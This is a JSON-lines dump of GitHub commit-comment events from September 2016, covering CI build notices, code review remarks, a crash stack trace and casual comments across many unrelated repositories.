{"id":"4516257897","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898589,"position":null,"line":null,"path":null,"commit_id":"7d86aa8c7ba2eecb184b666d64825f521d647788","created_at":"2016-09-05T10:41:41Z","updated_at":"2016-09-05T10:41:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 920](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12530&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T10:41:41Z"}
{"id":"4516258005","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/mamal"},"payload":{"comment":{"id":18898590,"position":null,"line":null,"path":null,"commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-05T10:41:42Z","updated_at":"2016-09-05T10:41:42Z","body":"47373a6"}},"created_at":"2016-09-05T10:41:42Z"}
{"id":"4516259326","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/mamal"},"payload":{"comment":{"id":18898592,"position":4,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-05T10:42:03Z","updated_at":"2016-09-05T10:42:03Z","body":"@feever_11"}},"created_at":"2016-09-05T10:42:03Z"}
{"id":"4516261813","type":"CommitCommentEvent","actor":{"login":"mathieudutour"},"repo":{"name":"thgreasi/localForage-cordovaSQLiteDriver"},"payload":{"comment":{"id":18898603,"position":5,"line":36,"path":"dist/localforage-cordovasqlitedriver.es6.js","commit_id":"0373437722ebff7e0196a57243f60734c6eb7edc","created_at":"2016-09-05T10:42:38Z","updated_at":"2016-09-05T10:42:38Z","body":"should be `cordova is undefined` right?"}},"created_at":"2016-09-05T10:42:38Z"}
{"id":"4516265365","type":"CommitCommentEvent","actor":{"login":"TimelessNL"},"repo":{"name":"openwrt-vgv7519/uboot-bin"},"payload":{"comment":{"id":18898608,"position":null,"line":null,"path":null,"commit_id":"76fdd8e638f81e324ffe77856481bd147398f6e8","created_at":"2016-09-05T10:43:35Z","updated_at":"2016-09-05T10:43:35Z","body":"zita212, the 5 port switch is not going to work with the current lantiq drivers. The driver configures eth1 as a specific WAN port. IMHO it's not wise to continue this subject on a \"github commit\" which is outdated anyway. Rest of the questions are basic OpenWRT/LEDE usage and are not specific to the VGV7519."}},"created_at":"2016-09-05T10:43:35Z"}
{"id":"4516266990","type":"CommitCommentEvent","actor":{"login":"ddeboer"},"repo":{"name":"driebit/ginger"},"payload":{"comment":{"id":18898611,"position":56,"line":56,"path":"modules/mod_ginger_remark/translations/nl.po","commit_id":"921bb062874598d6ddd66517c30e8f52bd701816","created_at":"2016-09-05T10:44:04Z","updated_at":"2016-09-05T10:44:04Z","body":"Should be: ‘E-mail zichtbaar’"}},"created_at":"2016-09-05T10:44:04Z"}
{"id":"4516268418","type":"CommitCommentEvent","actor":{"login":"ddeboer"},"repo":{"name":"driebit/ginger"},"payload":{"comment":{"id":18898616,"position":null,"line":null,"path":null,"commit_id":"921bb062874598d6ddd66517c30e8f52bd701816","created_at":"2016-09-05T10:44:28Z","updated_at":"2016-09-05T10:44:28Z","body":"Please remember the `.mo` file does not need to be committed."}},"created_at":"2016-09-05T10:44:28Z"}
{"id":"4516276925","type":"CommitCommentEvent","actor":{"login":"cloud9350"},"repo":{"name":"FullGreen/build_script"},"payload":{"comment":{"id":18898640,"position":null,"line":null,"path":null,"commit_id":"87478d768d30799928c128d6f0295c2ef80c6ba6","created_at":"2016-09-05T10:46:42Z","updated_at":"2016-09-05T10:46:42Z","body":"안되 내 디바이스 트리 업데이트 기능이 ㅜㅜ"}},"created_at":"2016-09-05T10:46:42Z"}
{"id":"4516283113","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898651,"position":null,"line":null,"path":null,"commit_id":"7d86aa8c7ba2eecb184b666d64825f521d647788","created_at":"2016-09-05T10:48:18Z","updated_at":"2016-09-05T10:48:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 920](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12530&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:06:37"}},"created_at":"2016-09-05T10:48:18Z"}
{"id":"4516285007","type":"CommitCommentEvent","actor":{"login":"loewenheim"},"repo":{"name":"gapt/gapt"},"payload":{"comment":{"id":18898656,"position":null,"line":null,"path":null,"commit_id":"e0494ec096a6b65884dbc15c48e0dbd0568623cd","created_at":"2016-09-05T10:48:46Z","updated_at":"2016-09-05T10:48:46Z","body":"So I tried this at home and it works without issue. Maybe it's a hardware limitation."}},"created_at":"2016-09-05T10:48:46Z"}
{"id":"4516289110","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/mamal"},"payload":{"comment":{"id":18898671,"position":5,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-05T10:49:48Z","updated_at":"2016-09-05T10:49:48Z","body":"186043411"}},"created_at":"2016-09-05T10:49:48Z"}
{"id":"4516289588","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18898673,"position":49,"line":318,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"9f0a6dceff48e3afa26ef4f0715b411d635276f8","created_at":"2016-09-05T10:49:56Z","updated_at":"2016-09-05T10:49:56Z","body":"I think it's the only way of CoerceCallback doesn't work. Also note that you don't have to cast to action, Catel has extension methods for this out of the box."}},"created_at":"2016-09-05T10:49:56Z"}
{"id":"4516291733","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18898679,"position":null,"line":null,"path":null,"commit_id":"c55827a74eff5c9c9c6ee6abc12224838981d9a5","created_at":"2016-09-05T10:50:29Z","updated_at":"2016-09-05T10:50:29Z","body":"Yey means it boot up :)"}},"created_at":"2016-09-05T10:50:29Z"}
{"id":"4516293374","type":"CommitCommentEvent","actor":{"login":"albertostratio"},"repo":{"name":"anistal/dcos-cli"},"payload":{"comment":{"id":18898681,"position":null,"line":null,"path":null,"commit_id":"9c9f903278e69098d3c7b723ef8401586446b905","created_at":"2016-09-05T10:50:54Z","updated_at":"2016-09-05T10:50:54Z","body":"LGTM! "}},"created_at":"2016-09-05T10:50:54Z"}
{"id":"4516293987","type":"CommitCommentEvent","actor":{"login":"raycrewe"},"repo":{"name":"RealDeal5/oncampus"},"payload":{"comment":{"id":18898683,"position":null,"line":null,"path":null,"commit_id":"d3253eeaa053cd63b66f5f177956593e5ba28e6c","created_at":"2016-09-05T10:51:03Z","updated_at":"2016-09-05T10:51:03Z","body":"hiiii"}},"created_at":"2016-09-05T10:51:03Z"}
{"id":"4516294923","type":"CommitCommentEvent","actor":{"login":"cagataycivici"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18898685,"position":null,"line":null,"path":null,"commit_id":"c0b9d3807f87528fab304c4e73679c4e60dc4689","created_at":"2016-09-05T10:51:17Z","updated_at":"2016-09-05T10:51:17Z","body":"Please see;\r\n\r\nhttps://github.com/primefaces/primeng/wiki/Building-From-Source"}},"created_at":"2016-09-05T10:51:17Z"}
{"id":"4516299749","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/mamal"},"payload":{"comment":{"id":18898694,"position":null,"line":null,"path":null,"commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-05T10:52:30Z","updated_at":"2016-09-05T10:52:30Z","body":"47373a6"}},"created_at":"2016-09-05T10:52:30Z"}
{"id":"4516309213","type":"CommitCommentEvent","actor":{"login":"xhochy"},"repo":{"name":"apache/parquet-cpp"},"payload":{"comment":{"id":18898704,"position":null,"line":null,"path":null,"commit_id":"fa6e47616e818f33d8d4774ce43ae6d62cdd59bd","created_at":"2016-09-05T10:54:57Z","updated_at":"2016-09-05T10:54:57Z","body":"Sad news, this only fixes it for `bit_width=1`. Will make a PR with a new failing test. There is a problem with the literal run size computation that is based on the assumption that literal runs will have a length of MAX_VALUES_PER_LITERAL_RUN. If we have more smaller literal runs, these will have more indicator bytes."}},"created_at":"2016-09-05T10:54:57Z"}
{"id":"4516312386","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18898710,"position":null,"line":null,"path":null,"commit_id":"eb6ae346a22215da70f815158af49b1fd8eba655","created_at":"2016-09-05T10:55:45Z","updated_at":"2016-09-05T10:55:45Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/380/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1957)."}},"created_at":"2016-09-05T10:55:45Z"}
{"id":"4516317241","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18898714,"position":25,"line":242,"path":"scripts/interaction.js","commit_id":"86654dcffb2d4463c73924e2bc2e64c69008841d","created_at":"2016-09-05T10:56:58Z","updated_at":"2016-09-05T10:56:58Z","body":"Uncaught TypeError: player.dnb.dialog.toggleClass is not a function"}},"created_at":"2016-09-05T10:56:58Z"}
{"id":"4516320567","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18898725,"position":null,"line":null,"path":null,"commit_id":"c55827a74eff5c9c9c6ee6abc12224838981d9a5","created_at":"2016-09-05T10:57:50Z","updated_at":"2016-09-05T10:57:50Z","body":":)\n\n2016-09-05 17:50 GMT+07:00 PhantomAssassin12 <notifications@github.com>:\n\n> Yey means it boot up :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/c55827a74eff5c9c9c6ee6abc12224838981d9a5#commitcomment-18898679>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9haet6ZCp809Ph137voOifNdEJtsks5qm_P1gaJpZM4J09am>\n> .\n>\n"}},"created_at":"2016-09-05T10:57:50Z"}
{"id":"4516322326","type":"CommitCommentEvent","actor":{"login":"CoDEmanX"},"repo":{"name":"Moteesh/blender"},"payload":{"comment":{"id":18898731,"position":null,"line":null,"path":null,"commit_id":"33fcd0444d45def9f86261fe4bc4d36986c1fc2f","created_at":"2016-09-05T10:58:19Z","updated_at":"2016-09-05T10:58:19Z","body":"Hm, can't remember this..."}},"created_at":"2016-09-05T10:58:19Z"}
{"id":"4516324528","type":"CommitCommentEvent","actor":{"login":"jfpla"},"repo":{"name":"eLBati/multi-company"},"payload":{"comment":{"id":18898737,"position":null,"line":null,"path":null,"commit_id":"60da725ab99543ccb4e8fcff7b7fcbdba6ac88c4","created_at":"2016-09-05T10:58:54Z","updated_at":"2016-09-05T10:58:54Z","body":"Nice, thanks"}},"created_at":"2016-09-05T10:58:54Z"}
{"id":"4516325611","type":"CommitCommentEvent","actor":{"login":"fommil"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18898739,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-05T10:59:11Z","updated_at":"2016-09-05T10:59:11Z","body":"@lunaryorn I thought this was the stable release: http://cask.readthedocs.io/en/latest/guide/installation.html\r\n\r\nshould it not point to the last stable?"}},"created_at":"2016-09-05T10:59:11Z"}
{"id":"4516326011","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18898740,"position":13,"line":13,"path":"depends/common/openssl/CMakeLists.txt","commit_id":"7bf2298ea83fdd480b47d8885ffce68cd0f75a86","created_at":"2016-09-05T10:59:18Z","updated_at":"2016-09-05T10:59:18Z","body":"indeed. not sure how i ended up mangling that one, fixed."}},"created_at":"2016-09-05T10:59:18Z"}
{"id":"4516330311","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18898744,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-05T11:00:28Z","updated_at":"2016-09-05T11:00:28Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.158](http://build.clear-measure.com/viewLog.html?buildId=10374&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-05T11:00:28Z"}
{"id":"4516332380","type":"CommitCommentEvent","actor":{"login":"jgribonvald"},"repo":{"name":"EsupPortail/esup-filemanager"},"payload":{"comment":{"id":18898748,"position":null,"line":null,"path":null,"commit_id":"486a38b136fc49989278a90edd73ec95b9c88d82","created_at":"2016-09-05T11:01:00Z","updated_at":"2016-09-05T11:01:00Z","body":"remove ^M"}},"created_at":"2016-09-05T11:01:00Z"}
{"id":"4516334553","type":"CommitCommentEvent","actor":{"login":"shlomif"},"repo":{"name":"perl6/perl6-examples"},"payload":{"comment":{"id":18898757,"position":null,"line":null,"path":null,"commit_id":"0838dc2282b57842c8530bd7bfe5e5e7a09e31c3","created_at":"2016-09-05T11:01:33Z","updated_at":"2016-09-05T11:01:33Z","body":"@paultcochrane : the if False blocks were used for debugging. Please add a debug flag for them."}},"created_at":"2016-09-05T11:01:33Z"}
{"id":"4516335309","type":"CommitCommentEvent","actor":{"login":"vdeturckheim"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898759,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T11:01:43Z","updated_at":"2016-09-05T11:01:43Z","body":"You made my day !"}},"created_at":"2016-09-05T11:01:43Z"}
{"id":"4516336116","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18898761,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-05T11:01:58Z","updated_at":"2016-09-05T11:01:58Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.158](http://build.clear-measure.com/viewLog.html?buildId=10374&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:29"}},"created_at":"2016-09-05T11:01:58Z"}
{"id":"4516338324","type":"CommitCommentEvent","actor":{"login":"needforspeed1501"},"repo":{"name":"sincromaster/opencart-module"},"payload":{"comment":{"id":18898765,"position":null,"line":null,"path":null,"commit_id":"115bf2a2ebed86423a94c90e329f97860993792e","created_at":"2016-09-05T11:02:33Z","updated_at":"2016-09-05T11:02:33Z","body":"Estou a procura do modulo gerencianet para a versao 1.5 do opencart que veio no sistema que encomendei ao desenvolvedor. Tenho medo de atualizar a versao e desconfigurar o sistema de bonificações que ele implantou na minha loja.\r\nSaberia me informar se esse modulo funcionaria em minha versao do opencart?\r\nOu se consigo esta versao em outro lugar?"}},"created_at":"2016-09-05T11:02:33Z"}
{"id":"4516358928","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"AlejandroMagual/sprint-website"},"payload":{"comment":{"id":18898808,"position":54,"line":64,"path":"stylesheet.css","commit_id":"900edbe7d0f2b71d6eb3c584e5a24be1193b785e","created_at":"2016-09-05T11:08:03Z","updated_at":"2016-09-05T11:08:03Z","body":"i see a problem with the absolute positioning here because as you already noticed, it causes problems when the screen size changes. think about how to lay out the these boxes without using absolute positioning. it's probably worthwhile to revisit `display: inline-block` and see how that could help you."}},"created_at":"2016-09-05T11:08:03Z"}
{"id":"4516360838","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18898811,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-05T11:08:34Z","updated_at":"2016-09-05T11:08:34Z","body":"Groups might also be used to scale endgames (compact pawn structures for both sides should be drawish, I guess)..."}},"created_at":"2016-09-05T11:08:34Z"}
{"id":"4516368288","type":"CommitCommentEvent","actor":{"login":"eburafi"},"repo":{"name":"eburafi/ottomanJS"},"payload":{"comment":{"id":18898833,"position":null,"line":null,"path":null,"commit_id":"84c82bfd6f855f73945bf013eb645b99c20be1a6","created_at":"2016-09-05T11:10:34Z","updated_at":"2016-09-05T11:10:34Z","body":"..."}},"created_at":"2016-09-05T11:10:34Z"}
{"id":"4516370739","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18898839,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-05T11:11:13Z","updated_at":"2016-09-05T11:11:13Z","body":"I don't have money to buy another one. This one came with my notebook. "}},"created_at":"2016-09-05T11:11:13Z"}
{"id":"4516375430","type":"CommitCommentEvent","actor":{"login":"fabianehlert"},"repo":{"name":"fabianehlert/Blog"},"payload":{"comment":{"id":18898860,"position":null,"line":null,"path":null,"commit_id":"19510facea161e3e8a6f39fd0adbffe88cd66145","created_at":"2016-09-05T11:12:28Z","updated_at":"2016-09-05T11:12:28Z","body":"It is still possible to generate these files via commandline.\r\nJust `cd` to the blog directory and write `hugo` in Terminal."}},"created_at":"2016-09-05T11:12:28Z"}
{"id":"4516378818","type":"CommitCommentEvent","actor":{"login":"delshanchanu"},"repo":{"name":"delshanchanu/hello-world"},"payload":{"comment":{"id":18898864,"position":null,"line":null,"path":null,"commit_id":"f1289b0bf14af1187e442e276bc18e5601c3b6df","created_at":"2016-09-05T11:13:18Z","updated_at":"2016-09-05T11:13:18Z","body":"saSasSssAS"}},"created_at":"2016-09-05T11:13:18Z"}
{"id":"4516381168","type":"CommitCommentEvent","actor":{"login":"IOSZhangZhe"},"repo":{"name":"IOSZhangZhe/ZhangProject"},"payload":{"comment":{"id":18898871,"position":2,"line":2,"path":"README.md","commit_id":"4fd9e36322f371f2995ad3afae6eb969027b51a6","created_at":"2016-09-05T11:13:58Z","updated_at":"2016-09-05T11:13:58Z","body":"2.  测试的。"}},"created_at":"2016-09-05T11:13:58Z"}
{"id":"4516385821","type":"CommitCommentEvent","actor":{"login":"mars8022"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":18898880,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-05T11:15:15Z","updated_at":"2016-09-05T11:15:15Z","body":"Exception code: C0000005 ACCESS_VIOLATION\r\nFault address:  651E6B2E 01:00015B2E C:\\Windows\\system32\\MSVCR120.dll\r\n\r\nRegisters:\r\nEAX:7FFFFFFE\r\nEBX:00000000\r\nECX:00000009\r\nEDX:FFFFFFFF\r\nESI:00000009\r\nEDI:3828F8AC\r\nCS:EIP:0023:651E6B2E\r\nSS:ESP:002B:3826F528  EBP:3826F7B4\r\nDS:002B  ES:002B  FS:0053  GS:002B\r\nFlags:00010202\r\n\r\nCall stack:\r\nAddress   Frame     Function      SourceFile\r\n651E6B2E  00000000  _fdopen+844\r\n65254AAF  00000000  _vsnprintf_l+81\r\n65254A29  00000000  _vsnprintf+16\r\n013CFB56  00000000  0001:002DEB56 G:\\SunWell\\worldserver.exe\r\n013D1910  00000000  0001:002E0910 G:\\SunWell\\worldserver.exe\r\n01247DDF  00000000  0001:00156DDF G:\\SunWell\\worldserver.exe\r\n01248840  00000000  0001:00157840 G:\\SunWell\\worldserver.exe\r\n013AEBCF  00000000  0001:002BDBCF G:\\SunWell\\worldserver.exe\r\n01145D14  00000000  0001:00054D14 G:\\SunWell\\worldserver.exe\r\n0110F855  00000000  0001:0001E855 G:\\SunWell\\worldserver.exe\r\n0110F055  00000000  0001:0001E055 G:\\SunWell\\worldserver.exe\r\n010F9659  00000000  0001:00008659 G:\\SunWell\\worldserver.exe\r\n013D65D1  00000000  0001:002E55D1 G:\\SunWell\\worldserver.exe\r\n651FC01D  00000000  __get_tlsindex+6F\r\n651FC001  00000000  __get_tlsindex+53\r\n76F8337A  00000000  BaseThreadInitThunk+12\r\n779992E2  00000000  RtlInitializeExceptionChain+63\r\n779992B5  00000000  RtlInitializeExceptionChain+36\r\n========================\r\nLocal Variables And Parameters\r\n\r\nCall stack:\r\nAddress   Frame     Function      SourceFile\r\n651E6B2E  00000000  _fdopen+844\r\n\r\n65254AAF  00000000  _vsnprintf_l+81\r\n\r\n65254A29  00000000  _vsnprintf+16\r\n\r\n013CFB56  00000000  0001:002DEB56 G:\\SunWell\\worldserver.exe\r\n\r\n013D1910  00000000  0001:002E0910 G:\\SunWell\\worldserver.exe\r\n\r\n01247DDF  00000000  0001:00156DDF G:\\SunWell\\worldserver.exe\r\n\r\n01248840  00000000  0001:00157840 G:\\SunWell\\worldserver.exe\r\n\r\n013AEBCF  00000000  0001:002BDBCF G:\\SunWell\\worldserver.exe\r\n\r\n01145D14  00000000  0001:00054D14 G:\\SunWell\\worldserver.exe\r\n\r\n0110F855  00000000  0001:0001E855 G:\\SunWell\\worldserver.exe\r\n\r\n0110F055  00000000  0001:0001E055 G:\\SunWell\\worldserver.exe\r\n\r\n010F9659  00000000  0001:00008659 G:\\SunWell\\worldserver.exe\r\n\r\n013D65D1  00000000  0001:002E55D1 G:\\SunWell\\worldserver.exe\r\n\r\n651FC01D  00000000  __get_tlsindex+6F\r\n\r\n651FC001  00000000  __get_tlsindex+53\r\n\r\n76F8337A  00000000  BaseThreadInitThunk+12\r\n\r\n779992E2  00000000  RtlInitializeExceptionChain+63\r\n\r\n779992B5  00000000  RtlInitializeExceptionChain+36"}},"created_at":"2016-09-05T11:15:15Z"}
{"id":"4516386765","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18898881,"position":null,"line":null,"path":null,"commit_id":"c397719afa64853b642e9463ef139fde1e0db460","created_at":"2016-09-05T11:15:31Z","updated_at":"2016-09-05T11:15:31Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/381/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=gh-pages)."}},"created_at":"2016-09-05T11:15:31Z"}
{"id":"4516389483","type":"CommitCommentEvent","actor":{"login":"fourpastmidnight"},"repo":{"name":"git-for-windows/build-extra"},"payload":{"comment":{"id":18898892,"position":null,"line":null,"path":null,"commit_id":"13fe48c4141e89a345ab8a6df126261eb0908741","created_at":"2016-09-05T11:16:18Z","updated_at":"2016-09-05T11:16:18Z","body":"@XhmikosR This was reported on issue #872. You can reply there. Thanks!"}},"created_at":"2016-09-05T11:16:18Z"}
{"id":"4516391466","type":"CommitCommentEvent","actor":{"login":"thgreasi"},"repo":{"name":"thgreasi/localForage-cordovaSQLiteDriver"},"payload":{"comment":{"id":18898895,"position":5,"line":36,"path":"dist/localforage-cordovasqlitedriver.es6.js","commit_id":"0373437722ebff7e0196a57243f60734c6eb7edc","created_at":"2016-09-05T11:16:52Z","updated_at":"2016-09-05T11:16:52Z","body":"@mathieudutour  wow... that's a good one...\r\nCan you open a PR plz?\r\nI probably wanted to write \"cordova is not defined\"..."}},"created_at":"2016-09-05T11:16:52Z"}
{"id":"4516395823","type":"CommitCommentEvent","actor":{"login":"samakshjain"},"repo":{"name":"samakshjain/shop"},"payload":{"comment":{"id":18898900,"position":7,"line":36,"path":"shop/product/models.py","commit_id":"d183099eb419c7d4a2d7876f80dc14b6a576878e","created_at":"2016-09-05T11:18:08Z","updated_at":"2016-09-05T11:18:08Z","body":"https://www.renzolucioni.com/pythons-set-literals/"}},"created_at":"2016-09-05T11:18:08Z"}
{"id":"4516396066","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18898901,"position":null,"line":null,"path":null,"commit_id":"797e55178cdf0f4b2e9a35e8f6a3b893bf1f28fc","created_at":"2016-09-05T11:18:12Z","updated_at":"2016-09-05T11:18:12Z","body":"Thanks"}},"created_at":"2016-09-05T11:18:12Z"}
{"id":"4516396422","type":"CommitCommentEvent","actor":{"login":"ColonelMoutarde"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":18898903,"position":null,"line":null,"path":null,"commit_id":"7bcb087a83da2cddc6366ea5f7b2e076f268e7c9","created_at":"2016-09-05T11:18:17Z","updated_at":"2016-09-05T11:18:17Z","body":"Oui mais seulement sur les version de php antérieur à php5.3"}},"created_at":"2016-09-05T11:18:17Z"}
{"id":"4516397335","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18898904,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-05T11:18:32Z","updated_at":"2016-09-05T11:18:32Z","body":"By default, yes, but just in case something is wrong with FFmpeg, i enforced that codec in the only testing purpose.\r\nIf i found a way to make it working, and withdrawing do not affect that, i will delete of course ;-)\r\nI'm in the learning process about FFmpeg, only concerning this issue as too many different parameters..."}},"created_at":"2016-09-05T11:18:32Z"}
{"id":"4516399223","type":"CommitCommentEvent","actor":{"login":"ksrubka"},"repo":{"name":"ksrubka/cinema-system"},"payload":{"comment":{"id":18898909,"position":null,"line":null,"path":null,"commit_id":"8011af7c6f2a01e454308287d19efc91468b1092","created_at":"2016-09-05T11:19:04Z","updated_at":"2016-09-05T11:19:04Z","body":"Persist method saves new entity to the database, merge is updating existing ones. In \"creating movie\" story we need to save new entity. So I'm changing it to persist again."}},"created_at":"2016-09-05T11:19:04Z"}
{"id":"4516400117","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898913,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T11:19:18Z","updated_at":"2016-09-05T11:19:18Z","body":"Lucky you, if you don't see the difference."}},"created_at":"2016-09-05T11:19:18Z"}
{"id":"4516400122","type":"CommitCommentEvent","actor":{"login":"cfollet"},"repo":{"name":"KeitIG/museeks"},"payload":{"comment":{"id":18898914,"position":37,"line":37,"path":"src/js/utils/utils.js","commit_id":"a51edaca774e8bcbf89481980e9981808cb99fce","created_at":"2016-09-05T11:19:19Z","updated_at":"2016-09-05T11:19:19Z","body":"Why don't we remove duplicates before sorting?"}},"created_at":"2016-09-05T11:19:19Z"}
{"id":"4516400152","type":"CommitCommentEvent","actor":{"login":"chloehsu170"},"repo":{"name":"chloehsu170/hello_world"},"payload":{"comment":{"id":18898915,"position":null,"line":null,"path":null,"commit_id":"07efe68c2e20a762774cda27e9c61339288e2810","created_at":"2016-09-05T11:19:20Z","updated_at":"2016-09-05T11:19:20Z","body":"1"}},"created_at":"2016-09-05T11:19:20Z"}
{"id":"4516400297","type":"CommitCommentEvent","actor":{"login":"cy6erGn0m"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18898917,"position":9,"line":0,"path":"js/js.libraries/src/core/collections/AbstractList.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-05T11:19:23Z","updated_at":"2016-09-05T11:19:23Z","body":"what about modCount? where do we assert it's value?"}},"created_at":"2016-09-05T11:19:23Z"}
{"id":"4516401569","type":"CommitCommentEvent","actor":{"login":"kostd"},"repo":{"name":"argustelecom/wildfly"},"payload":{"comment":{"id":18898921,"position":null,"line":null,"path":null,"commit_id":"195a8a65a9fae006ad603e425f6a16d896183ed2","created_at":"2016-09-05T11:19:45Z","updated_at":"2016-09-05T11:19:45Z","body":"formally, this is out of JPA SPEC, but in JPA_SPEC-6 (https://java.net/jira/browse/JPA_SPEC-6) Linda decided to leave as current  behavior because no feedback was given."}},"created_at":"2016-09-05T11:19:45Z"}
{"id":"4516403793","type":"CommitCommentEvent","actor":{"login":"lycium"},"repo":{"name":"thargor6/JWildfire"},"payload":{"comment":{"id":18898924,"position":null,"line":null,"path":null,"commit_id":"e588469d5a2d89ebce757165a986e17c185c2734","created_at":"2016-09-05T11:20:21Z","updated_at":"2016-09-05T11:20:21Z","body":"It was fun while it lasted :)"}},"created_at":"2016-09-05T11:20:21Z"}
{"id":"4516408007","type":"CommitCommentEvent","actor":{"login":"ahan1990"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18898935,"position":26,"line":26,"path":"StrandkorbWAR/WebContent/pages/mieter.xhtml","commit_id":"00bb0955d48d8de73b7272fe3fd28a22f996fc96","created_at":"2016-09-05T11:21:32Z","updated_at":"2016-09-05T11:21:32Z","body":"dtSelection ist in der Klasse SelectedStrandkorbService definiert . Ist als ManagedBean definiert so wie in dem Primeface showcase verwendet worden ist."}},"created_at":"2016-09-05T11:21:32Z"}
